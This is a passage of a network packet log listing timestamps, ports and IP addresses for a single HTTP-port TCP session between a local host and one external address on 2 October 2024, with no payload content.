Oct 2, 2024 18:19:20.408898115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.408904076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408910990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.408936024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409080982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409095049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409118891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409132957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409142017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409178972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409184933 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409199953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409219980 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409229040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409240961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409255981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409270048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409282923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409296036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409312963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409323931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409353018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409590006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409605980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409631014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409640074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409656048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409667969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409676075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409694910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409703016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409720898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409738064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409746885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409756899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409770966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409785032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409799099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409812927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409826040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409835100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409853935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409866095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409879923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409898996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409909010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409918070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409938097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.409949064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.409986973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410084963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410098076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410116911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410129070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410146952 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410156965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410166025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410183907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410200119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410214901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410229921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410258055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410265923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410284042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410291910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410310030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410321951 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410336971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410466909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410479069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410502911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410516977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410530090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410548925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410567045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410576105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410590887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410604000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410615921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410631895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410640001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410657883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410666943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410686016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410698891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410737038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410754919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410763979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410773993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410792112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410809040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410819054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410828114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410846949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410859108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410873890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.410891056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.410907030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.447956085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448024035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448050022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448071003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448091984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448112011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448132038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448160887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448175907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448200941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448231936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448245049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448271036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448307991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448334932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448343992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448364019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448383093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448399067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448410034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448431015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448446989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448468924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448482037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448497057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448508978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448534966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448554993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448595047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448606014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448620081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448642015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448657990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448669910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448687077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448712111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448729038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448782921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448796034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448827028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448838949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448844910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448859930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448882103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448899984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448936939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448954105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448973894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.448981047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.448990107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.449008942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.449018002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.449037075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.449045897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.449071884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.462193012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.462224960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.462243080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.462260962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.462282896 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.462304115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.462383032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.462409019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.462425947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.462465048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.462465048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.462485075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.462522030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500140905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500191927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500204086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500220060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500243902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500257015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500346899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500361919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500387907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500396967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500411987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500428915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500438929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500458002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500471115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500494957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500509977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500543118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500572920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500586987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500611067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500628948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500652075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500665903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500691891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500699043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500709057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500729084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.500741005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500766039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.500984907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501003981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501024008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501038074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501044989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501064062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501080990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501101017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501111031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501127005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501141071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501151085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501164913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501182079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501192093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501209021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501229048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501236916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501254082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501266956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501276016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501317024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501353025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501365900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501389980 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501400948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501414061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501437902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501452923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501467943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501493931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501502037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501554966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501574993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501583099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501602888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501621962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501632929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501642942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501662016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501672029 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501691103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501702070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501739025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501763105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501780033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501801968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501811981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501827002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501844883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501854897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501854897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501869917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501893044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501910925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501928091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501935959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501955032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501965046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.501983881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.501991987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502012014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502021074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502039909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502049923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502069950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502078056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502098083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502106905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502134085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502394915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502409935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502440929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502448082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502456903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502470016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502480984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502499104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502507925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502526999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502545118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502554893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502554893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502573013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502584934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502612114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502783060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502798080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502823114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502835989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502842903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502861023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502878904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502887011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502897978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502914906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502923012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502942085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502958059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502965927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502975941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.502991915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.502999067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503017902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503026009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503045082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503052950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503072977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503081083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503099918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503108978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503137112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503320932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503335953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503359079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503372908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503379107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503407001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503429890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503444910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503469944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503475904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503484964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503504038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503513098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503532887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.503542900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.503567934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540312052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540368080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540395021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540410042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540435076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540450096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.540473938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540492058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.540509939 CEST	49737	80	192.168.2.4	185.215.113.37
